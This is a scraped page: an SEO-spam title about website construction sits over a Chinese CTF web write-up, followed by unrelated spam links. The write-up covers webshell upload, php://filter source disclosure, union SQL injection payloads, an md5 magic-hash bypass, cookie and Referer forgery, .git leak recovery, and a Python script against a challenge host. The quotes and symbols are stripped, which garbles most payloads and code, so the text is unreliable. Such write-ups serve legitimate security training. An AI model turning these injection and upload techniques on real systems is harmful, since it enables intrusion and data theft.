当前位置: 首页 > news >正文

大港网站建设廊坊网站建设企业

大港网站建设,廊坊网站建设企业,怎么注册公司需要什么条件,app界面设计总结Flask_FileUpload 文件上传 先随便传个一句话木马 看看回显 果然不符合规定 而且发现改成图片什么的都不行 查看页面源代码#xff0c;发现提示 那应该就要用python命令才行 试试ls 类型要改成图片 cat /flag 好像需要密码 bp爆破 根据提示#xff0c;我们先抓包 爆破 …Flask_FileUpload 文件上传 先随便传个一句话木马 看看回显 果然不符合规定 而且发现改成图片什么的都不行 查看页面源代码发现提示 那应该就要用python命令才行 试试ls 类型要改成图片 cat /flag 好像需要密码 bp爆破 根据提示我们先抓包 爆破 得到密码12328 得到flag 文件包含  点一下 尝试直接访问 看样子要用 php://filter协议 ?filephp://filter/readconvert.base64-encode/resourceindex.php 解密 成绩查询 sql 很明显是sql注入了 bp抓包 单引号会没有信息需要加上注释符 判断列数为4 判断回显点 当前数据库 爆表 id-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schemaskctf),4# 列名 id-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_namefl4g),4# 备份是个好习惯 md5 进去有点meng了 怎么就一串数字 因为题目说备份 我先拿dirsearch扫一下 不出所料 bak里面有东西 ?php /*** Created by PhpStorm.* User: Norse* Date: 2017/8/6* Time: 20:22 */include_once flag.php; ini_set(display_errors, 0); $str strstr($_SERVER[REQUEST_URI], ?); $str substr($str,1); $str str_replace(key,,$str); parse_str($str); echo md5($key1);echo md5($key2); if(md5($key1) md5($key2) $key1 ! $key2){echo $flag.取得flag; } ? 首先获取完整的url并且strstr将url中“”及其之后的内容赋值给str 其次substr函数将str中第二个字符下标为1及其以后的内容赋值给str 再次str_replace函数将str中的子字符串替换为也就是删除str中的内容为key的子串 然后parse_str() 函数把查询字符串解析到变量中 MD5值比较相等PHP弱类型   在PHP中 在进行比较的时候会先将字符串类型转化成相同再比较。注意如果比较一个数字和字符串 或者 比较涉及到数字内容的字符串时则字符串会被转换成数值并按照数值来进行比较。   举个小例子 var_dump(asdas0); 和 var_dump(0asdas0); 的结果都是true。   所以本题是要两MD5值的字符格式要么全部是字符要么前面数字是0。    我们都知道MD5 加密是对字符串进行加密那么如果我们传入的不是字符串而是一个数组呢 它没法进行加密返回空结果不就相等了吗   众所周知科学计数法是 *e***** ,那么要使两个数的值相等就只能是 0e***** 所以只要找到两个加密之后是 0e 开头的数字就可以绕过限制了。 QNKCDZO 240610708 s878926199a s155964671a s214587387a s214587387a /?kkeyey1240610708kkeyey2QNKCDZO game1 随便玩了一下没想到这么高笑死我了 网络分析一下 把sign里面内容解密一下 可以发现ZM后面部分被base64加密 刚好就是分数 直接打开 把分数改为99999后面base64也要修稿 cookies 打开奇奇怪怪的 分析一下 解密 结果 试一下index.php 当然也要base64加密 发现这里还有参数line 需要加上 line2也是如此 这样就可以把源码down下来 18行代码 ?phperror_reporting(0);$filebase64_decode(isset($_GET[filename])?$_GET[filename]:);$lineisset($_GET[line])?intval($_GET[line]):0;if($file) header(location:index.php?linefilenamea2V5cy50eHQ);$file_list array(0 keys.txt,1 index.php,);if(isset($_COOKIE[margin]) $_COOKIE[margin]margin){$file_list[2]keys.php;}if(in_array($file, $file_list)){$fa file($file);echo $fa[$line];}?后来还看到别人写的脚本 import requestsa19for i in range(a):url http://114.67.175.224:19674/index.php?linestr(i)filenameaW5kZXgucGhws requests.get(url)print(s.text)源码提示需要cookie满足marginmargin才能访问继续指向keys.php 还要加上cookie 查看源代码 source git 源代码 假的fag 还以为要解码 瑞士军刀没解出来 题目提示 dirsearch扫扫看 这里肯定要下载giit了 下面还有falg.txt 不出所料也是假的 wget -r http://114.67.175.224:14733/.git git reflog git reflog是显示所有的操作记录包括提交回退的操作。一般用来找出操作记录中的版本号进行回退。  命令git show(文件名) 如git show d256328 最终也是在40c6d51文件中发现flag  速度要快 查看源代码 bp抓包看看 这里居然有flag 解码 又给了falg 这应该是margin的值 然后每次抓包数字都不一样。。 是要跑脚本了 import requests import base64#后面涉及到base64解码所以要导入这个模块 urlhttp://114.67.175.224:13927 srequests.session()#保持会话 sources.get(url).headers#因为flag在头部所以需要抓取头部 resultbase64.b64decode(source[flag])#对source进行解码同时将值放在flag列表里面 resultresult.decode()将操作后的result进行转换b64decode后操作的对象 是byte类型的字符串而split函数要用str类型的flagbase64.b64decode(result.split(:)[1])用split函数进行截取因为抓包的flag有:所以从它后面进行划分 [1]代表选取第二部分从0开始因为这个函数操作类型必须是str型所以有上一步data{margin:flag}#相当于创建一个字典将margin对应flag print(s.post(url,data).text)#用post方法传入margin同时输出 你从哪里来 抓包 这里要修改referer 之前一直以为要用x-forwarded-for ,谁道用的是referer X-Forwarded-ForXFF用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。  格式如下: X-Forwarded-For: client1, proxy1, proxy2 其中的值通过一个 逗号空格 把多个IP地址区分开, 最左边client1是最原始客户端的IP地址, 代理服务器每成功收到一个请求就把请求来源IP地址添加到右边。 在上面这个例子中这个请求成功通过了三台代理服务器proxy1, proxy2 及 proxy3。请求由client1发出到达了proxy3proxy3可能是请求的终点。请求刚从client1中发出时XFF是空的请求被发往proxy1通过proxy1的时候client1被添加到XFF中之后请求被发往proxy2;通过proxy2的时候proxy1被添加到XFF中之后请求被发往proxy3通过proxy3时proxy2被添加到XFF中之后请求的的去向不明如果proxy3不是请求终点请求会被继续转发。鉴于伪造这一字段非常容易应该谨慎使用X-Forwarded-For字段。正常情况下XFF中最后一个IP地址是最后一个代理服务器的IP地址, 这通常是一个比较可靠的信息来源。 Referer  是  HTTP  请求header 的一部分当浏览器或者模拟浏览器行为向web 服务器发送请求的时候头信息里有包含 Referer  。比如我在www.sojson.com 里有一个www.baidu.com 链接那么点击这个www.baidu.com 它的header 信息里就有     Refererhttps://www.sojson.com 由此可以看出来吧。它就是表示一个来源告诉服务器该网页是从哪个页面链接过来的。 x-forwarded-for 和 referer的区别我的理解是x-forwarded-for 用来证明ip的像是“127.0.0.1”这种而referer是用来证明“域名”的 orgin和referer的区别: origin主要是用来说明最初请求是从哪里发起的 origin只用于Post请求而Referer则用于所有类型的请求 origin的方式比Referer更安全点
http://www.w-s-a.com/news/358943/

相关文章:

  • 建设赚钱的网站福州便民生活网
  • 咸阳网站设计建设公司小程序打包成app
  • 做视频网站视频文件都存放在哪做旅游宣传图的网站有哪些
  • 地方门户类网站产品推广惠州市中国建设银行网站
  • 网站建设公司推荐5788移动版wordpress
  • 产品类型 速成网站淘宝怎么建立自己的网站
  • 南京优化网站建设公司的网站怎么建设
  • 做网站开发能挣钱月嫂云商城网站建设
  • 包装网站模板新手入门网站建设
  • 做网站的天津哪个公司做网站
  • 网站建设摊销时间是多久微信官网免费下载安装
  • 网站解析是做a记录吗群晖 wordpress 阿里云
  • 涉县移动网站建设公司常州做网站的公司有哪些
  • 网站批量创建程序中国十大人力资源公司
  • 菏泽网站建设 梧桐树二次开发创造作用
  • 维护网站费用长沙广告设计公司排名
  • 模仿别人网站侵权wordpress 修改链接失效
  • wordpress文章设置受密码保护南宁网站优化公司哪家好
  • 网站开发工程师介绍设计类的网站
  • 嘉兴seo网站推广中山建网站多少钱
  • 高端汽车网站建设帮别人做网站自己为什么会被抓
  • 网站开发实验室建设方案wordpress 主题丢失
  • 珠宝网站建设平台分析报告郑州最新发布
  • 世界杯最新排名泉州seo网站关键词优
  • 广州公司网站提供如何推广新品
  • 网站建设如何描述沈阳网站建设推广平台
  • 用dw制作个介绍家乡网站学生个人简历
  • 建设银行企业网站访问不了wordpress搬到谷歌服务器
  • 网站建设与网站优化销售别墅庭院园林景观设计公司
  • 沈阳红方城网站建设专业的微网站哪家好